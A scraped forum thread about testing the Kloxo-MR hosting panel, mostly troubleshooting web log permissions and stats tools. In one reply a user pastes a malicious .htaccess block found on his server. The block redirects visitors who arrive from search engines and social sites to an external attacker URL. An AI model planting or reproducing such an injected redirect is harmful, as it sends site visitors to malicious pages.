Sponsor:

Server and Web Integrator
Link:
Kloxo-MR logo
6.5.0 or 7.0.0
Click for "How to install"
Donation/Sponsorship:
Kloxo-MR is open-source.
Donate and or Sponsorship always welcome.
Click to:
Click Here
Please login or register. 2024-05-02, 15:07:44

Author Topic: Need Kloxo-MR Tester  (Read 225458 times)

0 Members and 1 Guest are viewing this topic.

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: Need Kloxo-MR Tester
« Reply #405 on: 2013-02-16, 23:24:54 »
Look at rkhunter log in 'log manager'. Maybe you find something.
« Last Edit: 1970-01-01, 01:00:00 by Guest »
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: Need Kloxo-MR Tester
« Reply #406 on: 2013-02-16, 23:25:20 »
Quote from: "MRatWork"
Look at rkhunter log in 'log manager'. Maybe you find something.

Code: [Select]
#336988#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru).(.*)
RewriteRule ^(.*)$ http://cerfust.nl/paprika/clik.php [R=301,L]
</IfModule>

#/336988#

###Start Kloxo PHP config Area
###Please Don't edit these comments or the content in between. kloxo uses this to recognize the lines it writes to the the file. If the above line is corrupted, it may fail to recognize them, leading to multiple lines.

Log is clean...
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: Need Kloxo-MR Tester
« Reply #407 on: 2013-02-16, 23:30:16 »
If only certain domain(s) infected, it's mean application (example: wordpress) have backdoor process (maybe from plugins).
« Last Edit: 1970-01-01, 01:00:00 by Guest »
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: Need Kloxo-MR Tester
« Reply #408 on: 2013-02-16, 23:45:07 »
Quote from: "MRatWork"
If only certain domain(s) infected, it's mean application (example: wordpress) have backdoor process (maybe from plugins).

The problem is this domain is clear without any application.

I've also found that access and errror logs for each domain are not working !
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: Need Kloxo-MR Tester
« Reply #409 on: 2013-02-17, 00:03:46 »
Weird - logging works for some domains and for some doesn't work at all :/
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: Need Kloxo-MR Tester
« Reply #410 on: 2013-02-17, 00:06:17 »
Got it:

- working one uses nginx as user

Quote
ls -l /home/httpd/domain.pl/stats/domain.pl-custom_log
-rw-rw-r-- 1 nginx apache 1,2M lut 16 19:06 /home/httpd/domain.pl/stats/domain.pl-custom_log

- non-working uses apache as user

Quote
ls -l /home/httpd/domain.pl/stats/domain.pl-custom_log
-rw-rw-r-- 1 apache apache 0 lut 11 04:07 /home/httpd/domain.pl/stats/domain.pl-custom_log

Will this be enough to fix it ?

Code: [Select]
/script/fix-chownchmod --select=chown
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: Need Kloxo-MR Tester
« Reply #411 on: 2013-02-17, 00:58:31 »
Default chown is apache:apache but chmod is 771. Try first, change chmod as 775. If it's ok I will modified fix-chownchmod to accept this situation.

Change to chown to nginx will be trouble we change webserver to other.
« Last Edit: 1970-01-01, 01:00:00 by Guest »
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: Need Kloxo-MR Tester
« Reply #412 on: 2013-02-17, 01:08:21 »
Quote from: "MRatWork"
Default chown is apache:apache but chmod is 771. Try first, change chmod as 775. If it's ok I will modified fix-chownchmod to accept this situation.

Change to chown to nginx will be trouble we change webserver to other.

Not working even after:

/etc/init.d/nginx restart;
/etc/init.d/httpd graceful;
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: Need Kloxo-MR Tester
« Reply #413 on: 2013-02-17, 01:14:55 »
I see logs are popping in /etc/httpd/logs directory... Why ?
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: Need Kloxo-MR Tester
« Reply #414 on: 2013-02-17, 01:25:45 »
This '/home/httpd/domain.pl/stats/domain.pl-custom_log' is awstats data. Not related to collectquota.
« Last Edit: 1970-01-01, 01:00:00 by Guest »
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: Need Kloxo-MR Tester
« Reply #415 on: 2013-02-17, 01:47:20 »
Quote from: "MRatWork"
This '/home/httpd/domain.pl/stats/domain.pl-custom_log' is awstats data. Not related to collectquota.

I know. But I think webalizer use it too. I use webalizer on my servers and now my stats stopped working :/
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: Need Kloxo-MR Tester
« Reply #416 on: 2013-02-17, 01:53:58 »
Webalizer covert data from /var/log/httpd to their presentation (html and image) inside '/home/httpd/<domain>/webstats/webstats'
« Last Edit: 1970-01-01, 01:00:00 by Guest »
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

Offline Spacedust

  • Super Grand Master
  • ****
  • Posts: 4,050
  • Karma: +1/-0
    • View Profile
Re: Need Kloxo-MR Tester
« Reply #417 on: 2013-02-17, 02:32:15 »
Quote from: "MRatWork"
Webalizer covert data from /var/log/httpd to their presentation (html and image) inside '/home/httpd/<domain>/webstats/webstats'

Does it work with nginxproxy ? My customers won't be able to see their own logs without this.
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline 4danlod

  • Junior Member
  • *
  • Posts: 1
  • Karma: +0/-0
    • View Profile
Re: Need Kloxo-MR Tester
« Reply #418 on: 2013-02-17, 03:18:40 »
Hello Mustafa

i can do it because i want to development kloxo and help you , i don't need vps but i need to make stable kloxo not different between official kloxo or Kloxo MR because this kloxo must compete with another control panel etc cpanel , directi , ...

if you want please contact me on your site or Yahoo ID ( farhadsafiri ) .

my job is linux system administration debug and troubleshooting .

With Best Regards

Farhad Safiri
« Last Edit: 1970-01-01, 01:00:00 by Guest »

Offline MRatWork

  • Administrator
  • The Elite
  • *****
  • Posts: 15,807
  • Karma: +119/-11
  • Gender: Male
    • View Profile
    • MRatWork Forum
Re: Need Kloxo-MR Tester
« Reply #419 on: 2013-02-17, 06:54:45 »
Quote from: "Spacedust"
Quote from: "MRatWork"
Webalizer covert data from /var/log/httpd to their presentation (html and image) inside '/home/httpd/<domain>/webstats/webstats'

Does it work with nginxproxy ? My customers won't be able to see their own logs without this.
Yes, it's work for nginx-proxy.

Different with awstats, webalizer not real-time process but convert per-day.

You can see stats for this forum to know about webalizer.
« Last Edit: 1970-01-01, 01:00:00 by Guest »
..:: MRatWork (Mustafa Ramadhan Projects) ::..
-- Server/Web-integrator - Web Hosting (Kloxo-MR READY!) --

 


MRatWork Affiliates:    BIGRAF(R) Inc.    House of LMAR    EFARgrafix

Page created in 0.065 seconds with 22 queries.

web stats analysis